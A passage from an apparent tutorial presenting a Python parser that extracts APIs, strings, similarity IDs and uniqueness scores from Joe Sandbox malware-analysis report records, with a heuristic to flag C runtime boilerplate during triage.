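• __CxxThrowException@8.LIBVCRUNTIME ref: 00E5367C
  • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
Strings
• This function cannot be called on a default constructed task, xrefs: 00E53666
Similarity
• API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
• String ID: This function cannot be called on a default constructed task
• API String ID: 1843230569-3567850458
• Opcode ID: 6c69a0ccd85c714d391eb674009446ddecd0a3936eedce7f5f3de453b2734c3b
• Instruction ID: 6efb3ab381d44dc485fa48ba9392be1073e076f069fb47d1efb3a857b824d875
Uniqueness

Uniqueness Score: -1.00%
"""

# Section headers as they appear in the report.
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
           "Yara matches", "Similarity", "Uniqueness"}
FUNC_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(\)\s*\{", re.M)
# '• name.LIBRARY ref: ADDR' or '• Part of subcall function ADDR: name.LIB(args), ref: ADDR'
API_RE = re.compile(r"^\s*• (?:Part of subcall function ([0-9A-F]+): )?"
                    r"(.+)\.([A-Z0-9]+)(?:\(.*?\))?,? ref: ([0-9A-F]+)\s*$")
STRING_RE = re.compile(r"^\s*• (.+), xrefs: ([0-9A-F]+)\s*$")
KV_RE = re.compile(r"^\s*• ([A-Za-z ]+ ID): (\S+)\s*$")   # only space-free IDs
UNIQ_RE = re.compile(r"Uniqueness Score: (-?\d+(?:\.\d+)?)%")
SPLIT_RE = re.compile(r"^\s*C-Code - Quality: \d+%\s*$", re.M)

# Assumption: IDA library tags for the statically linked MSVC runtimes.
# LIBCMTD is the static debug CRT (libcmtd.lib), LIBVCRUNTIME the VC runtime.
RUNTIME_LIBS = {"LIBCMT", "LIBCMTD", "LIBVCRUNTIME", "LIBUCRT", "LIBUCRTD"}


@dataclass
class ApiRef:
    name: str
    library: str
    ref: str
    subcall: bool          # True for '• Part of subcall function …' lines


@dataclass
class FunctionRecord:
    name: str
    apis: List[ApiRef] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (text, xref)
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    uniqueness: Optional[float] = None


def parse_record(text: str) -> FunctionRecord:
    """Parse one record (from its C-Code block to its Uniqueness score)."""
    m = FUNC_RE.search(text)
    if not m:
        raise ValueError("no decompiled function header found")
    rec = FunctionRecord(name=m.group(1))
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in HEADERS:          # a bare header line switches section
            section = stripped
            continue
        if section == "APIs":
            am = API_RE.match(line)
            if am:
                rec.apis.append(ApiRef(name=am.group(2), library=am.group(3),
                                       ref=am.group(4), subcall=am.group(1) is not None))
        elif section == "Strings":
            sm = STRING_RE.match(line)
            if sm:
                rec.strings.append((sm.group(1), sm.group(2)))
        elif section == "Similarity":
            km = KV_RE.match(line)
            if km:
                key, value = km.groups()
                if key == "API String ID":
                    rec.api_string_id = value
                elif key == "Opcode ID":
                    rec.opcode_id = value
                elif key == "Instruction ID":
                    rec.instruction_id = value
        elif section == "Uniqueness":
            um = UNIQ_RE.search(line)
            if um:
                rec.uniqueness = float(um.group(1))
    return rec


def parse_records(page_text: str) -> List[FunctionRecord]:
    """Split a whole report page on its 'C-Code - Quality: N%' markers."""
    chunks = SPLIT_RE.split(page_text)[1:]   # text before the first marker is not a record
    return [parse_record(c) for c in chunks]


def is_runtime_boilerplate(rec: FunctionRecord) -> bool:
    """Heuristic (assumption): every directly referenced API, ignoring
    'Part of subcall' entries, is tagged with a static CRT library."""
    direct = [a for a in rec.apis if not a.subcall]
    return bool(direct) and all(a.library in RUNTIME_LIBS for a in direct)


if __name__ == "__main__":
    for r in parse_records(SAMPLE_RECORD):
        tag = "runtime" if is_runtime_boilerplate(r) else "sample"
        print(r.name, tag, r.api_string_id, [a.name for a in r.apis])
```

Records flagged as runtime boilerplate can be deprioritized during triage; the remaining ones are worth reading. The API String ID and Opcode/Instruction IDs survive the parse so the same records can be matched across reports of related samples, which is what the report's Similarity section is for.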